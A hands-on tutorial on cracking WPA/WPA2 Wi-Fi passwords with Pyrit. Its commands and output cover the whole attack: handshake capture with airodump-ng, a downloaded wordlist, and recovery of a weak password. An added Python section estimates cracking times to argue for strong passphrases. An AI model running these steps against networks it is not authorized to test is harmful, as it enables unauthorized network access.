Technical Notes

Cracking WPA and WPA2 Wi-Fi Passwords with Pyrit

Pyrit is one of the most powerful WPA/WPA2 cracking tools in a hacker's toolkit: it can benchmark the speed of the computer's CPU, analyze capture files for crackable handshakes, and even make use of GPU password-cracking capabilities.

Installing Pyrit

To install Pyrit on a Kali system, type apt install pyrit in a terminal window. On a full Kali installation Pyrit is installed by default, but on the lite version you may need to install it manually.

~$ apt install pyrit

Reading package lists... Done
Building dependency tree
Reading state information... Done
pyrit is already the newest version (0.5.1+git20180801-1).
pyrit set to manually installed.
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
0 upgraded, 0 newly installed, 0 to remove and 1795 not upgraded.
~$ pyrit -h

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Usage: pyrit [options] command

Recognized options:
  -b               : Filters AccessPoint by BSSID
  -e               : Filters AccessPoint by ESSID
  -h               : Print help for a certain command
  -i               : Filename for input ('-' is stdin)
  -o               : Filename for output ('-' is stdout)
  -r               : Packet capture source in pcap-format
  -u               : URL of the storage-system to use
  --all-handshakes : Use all handshakes instead of the best one
  --aes            : Use AES

Recognized commands:
  analyze                 : Analyze a packet-capture file
  attack_batch            : Attack a handshake with PMKs/passwords from the db
  attack_cowpatty         : Attack a handshake with PMKs from a cowpatty-file
  attack_db               : Attack a handshake with PMKs from the db
  attack_passthrough      : Attack a handshake with passwords from a file
  batch                   : Batchprocess the database
  benchmark               : Determine performance of available cores
  benchmark_long          : Longer and more accurate version of benchmark (5 minutes)
  check_db                : Check the database for errors
  create_essid            : Create a new ESSID
  delete_essid            : Delete a ESSID from the database
  eval                    : Count the available passwords and matching results
  export_cowpatty         : Export results to a new cowpatty file
  export_hashdb           : Export results to an airolib database
  export_passwords        : Export passwords to a file
  help                    : Print general help
  import_passwords        : Import passwords from a file-like source
  import_unique_passwords : Import unique passwords from a file-like source
  list_cores              : List available cores
  list_essids             : List all ESSIDs but don't count matching results
  passthrough             : Compute PMKs and write results to a file
  relay                   : Relay a storage-url via RPC
  selftest                : Test hardware to ensure it computes correct results
  serve                   : Serve local hardware to other Pyrit clients
  strip                   : Strip packet-capture files to the relevant packets
  stripLive               : Capture relevant packets from a live capture-source
  verify                  : Verify 10% of the results by recomputation

We need to include a capture file containing our WPA/WPA2 handshake. We add it with the -r flag, followed immediately by the location of the file that holds our handshake. Next, we need to add a password list to Pyrit; we can use the import_unique_passwords command with the -i flag to indicate the password list to add. We will use the WPA password list from the SecLists GitHub repository. Finally, we use the -o flag to save the password to a file.

Once everything is ready, our final command should look like this:

~$ pyrit -r capture.pcap -o savedpass attack_batch

Downloading a Password List and Benchmarking the System

For our password list, we will download the excellent WPA cracking wordlist hosted in the SecLists GitHub repository. To download it to our desktop, type the following command in a terminal window.

~$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt

--2019-12-20 13:19:39--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45276 (44K) [text/plain]
Saving to: ‘probable-v2-wpa-top4800.txt’

probable-v2-wpa-top 100%[===================>]  44.21K  --.-KB/s    in 0.07s

2019-12-20 13:19:39 (627 KB/s) - ‘probable-v2-wpa-top4800.txt’ saved [45276/45276]

That list of the 4,800 worst passwords should now be downloaded to our desktop. To know how quickly we will be able to crack them, we need to benchmark our system with Pyrit. To do so, type pyrit benchmark in a terminal window and wait for it to complete.

~$ pyrit benchmark

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Running benchmark (1157.3 PMKs/s)... |

Computed 1157.32 PMKs/s total.
#1: 'CPU-Core (SSE2/AES)': 298.2 PMKs/s (RTT 2.9)
#2: 'CPU-Core (SSE2/AES)': 312.0 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2/AES)': 312.6 PMKs/s (RTT 2.7)
#4: 'CPU-Core (SSE2/AES)': 310.5 PMKs/s (RTT 3.0)

We add the passwords to the database with the import_passwords command, adding -i and the path to the password list to be added. Type the following command in a terminal window, modifying the path to match where you saved the password list.

~$ pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
4800 lines read. Flushing buffers....
All done.

Now that we have 4,800 passwords stored in Pyrit's database, we can use the attack_batch option.

Capturing a WPA/WPA2 Handshake

To capture a handshake, we need to listen for a device connecting to the target Wi-Fi network. First, let's put the card into wireless monitor mode so that we can listen for the handshake.

Type ifconfig to find the name of your wireless network adapter. If you are using a Kali-compatible external USB adapter, its name will probably be something like wlan1.

~$ ifconfig

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 856  bytes 71488 (69.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 856  bytes 71488 (69.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.37  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 2606:6000:66d0:a000:8991:f76f:faec:2713  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::903f:322c:1ad9:a365  prefixlen 64  scopeid 0x20<link>
        ether 30:52:cb:6b:76:5f  txqueuelen 1000  (Ethernet)
        RX packets 17933  bytes 22147581 (21.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10045  bytes 1333343 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:c0:ca:95:6e:74  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Next, we put the card into wireless monitor mode with the airmon-ng start wlan1 command. Airmon-ng is installed on Kali by default. When we run ifconfig again, our card should now be called "wlan1mon". Now, let's grab a handshake.

First, we scan to find which channel the target network is on. To do so, run airodump-ng wlan1mon. Again, you should already have airodump-ng installed.

~$ airodump-ng wlan1mon

CH 10 ][ Elapsed: 0 s ][ 2019-04-29 12:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 18:FE:34:00:00:02  -40        4        0    0   3  48   WPA2 CCMP   PSK  Chicken_Easy_02

We can see that the target network is on channel 3. Now that we know this, we can capture a handshake with the airodump-ng wlan1mon -c 3 -w capture command.

~$ airodump-ng wlan1mon -c 3 -w capture

Once a handshake has been captured, Pyrit can confirm it. Copy the location of the capture file, then run pyrit -r pathtocapturefile analyze to confirm that you have a valid capture.

~$ pyrit -r '/root/Desktop/capture-01.cap' analyze

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/marko-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

#1: AccessPoint 84:61:a0:61:39:90 ('ATT9X3s2e4'):
#2: AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01'):
  #1: Station 84:0d:8e:8c:b0:1c, 4 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1
    #2: HMAC_SHA1_AES, good, spread 1
    #3: HMAC_SHA1_AES, good, spread 87
    #4: HMAC_SHA1_AES, good, spread 87
#3: AccessPoint 6e:4d:73:96:78:a7 ('Edgardo'):
  #1: Station cc:29:f5:57:fc:98
#4: AccessPoint c4:01:7c:57:69:a8 ('LILA-Guest'):
#5: AccessPoint c4:01:7c:97:69:a8 ('LILA-STAFF'):
#6: AccessPoint 6c:b0:ce:ad:1e:53 ('MyCharterWiFi53-2G'):
#7: AccessPoint b0:98:2b:4a:b4:d4 ('MySpectrumWiFice-2G'):
#8: AccessPoint c4:01:7c:17:69:a8 ('PS-WL-MO'):

Running Pyrit on the Handshake

Now that we have captured the handshake and added the passwords to the database, we can run the attack_batch command we built earlier. Run pyrit -r pathtocapturefile -o savedpass attack_batch to attempt to crack the captured handshake.

~$ pyrit -r '/root/Desktop/capture-01.cap' -o savedpass attack_batch

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/capture-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

Picked AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01') automatically.
Tried 447 PMKs so far; 250 PMKs per second. password

The password is '123456789'.

We haven't covered everything Pyrit can do today; there is a great deal we didn't touch on. Of course, although Pyrit is one of the most powerful brute-force attacks available, a truly strong password will still defeat it. Pyrit can run dictionary attacks and true brute-force attacks, depending on what your system can handle, so if you don't want to be cracked easily by a tool like Pyrit, make sure you choose a strong password.
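To make the benchmark figures and the closing advice concrete, here is an added example (not code from the original post or from Pyrit) that computes the WPA/WPA2-PSK pairwise master key exactly as the standard defines it (PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 iterations, 32 bytes), which is the "PMK" that Pyrit's PMKs/s rate counts, and then uses the 1157.32 PMKs/s measured above to estimate how long exhausting a 4,800-word list takes versus a random passphrase. The function names and the keyspace sizes chosen for comparison are my own assumptions.

```python
import hashlib

# IEEE 802.11i PSK derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
# Every candidate passphrase a cracker tests costs one of these derivations; that is what "PMKs/s" measures.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK pairwise master key from a passphrase and SSID."""
    # The standard restricts passphrases to 8..63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def seconds_to_exhaust(candidates: int, pmks_per_second: float) -> float:
    """Worst-case time to test every candidate at a given benchmark rate."""
    return candidates / pmks_per_second


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of a fixed length over an alphabet (assumed uniform random choice)."""
    return alphabet_size ** length


if __name__ == "__main__":
    # Known-answer test vector from IEEE Std 802.11i Annex H.4.1: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    rate = 1157.32  # PMKs/s from the 'pyrit benchmark' run above (four CPU cores)
    year = 365 * 86400
    print(f"4,800-word list:               {seconds_to_exhaust(4800, rate):.1f} s")
    print(f"8 random lowercase letters:    {seconds_to_exhaust(keyspace(26, 8), rate) / year:.1f} years")
    print(f"12 random mixed alphanumerics: {seconds_to_exhaust(keyspace(62, 12), rate) / year:.2e} years")
```

A GPU raises the rate by orders of magnitude, but it does not change the shape of the comparison: a short or dictionary-derived passphrase falls in seconds, while a long random one pushes the worst case far past any practical budget.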
